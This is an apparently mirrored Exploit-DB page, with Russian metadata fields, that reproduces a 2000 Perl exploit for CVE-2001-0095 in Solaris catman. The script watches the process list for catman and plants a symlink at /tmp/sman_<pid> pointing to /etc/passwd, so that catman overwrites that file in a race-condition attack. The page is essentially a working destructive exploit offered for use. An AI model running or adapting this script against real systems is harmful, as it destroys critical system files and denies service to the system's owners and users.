- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 235
- Проверка EDB
-
- Пройдено
- Автор
- LWC
- Тип уязвимости
- DOS
- Платформа
- SOLARIS
- CVE
- cve-2001-0095
- Дата публикации
- 2000-12-20
Код:
#!/usr/local/bin/perl -w
#
# The problem is catman creates files in /tmp
# insecurly. They are based on the PID of the
# catman process, catman will happily clobber
# any files that are symlinked to that file.
# The idea of this script is to watch the
# process list for the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered. This exploit depends
# on system speed and process load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 [email protected]
# 11/21/2000 Vapid Labs.
# http://vapid.betteros.org
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/catman/) {
print "Symlinking sman_$args[1] to $clobber\n";
symlink($clobber,"/tmp/sman_$args[1]");
exit(1);
}
}
}
# milw0rm.com [2000-12-20]- Источник
- www.exploit-db.com
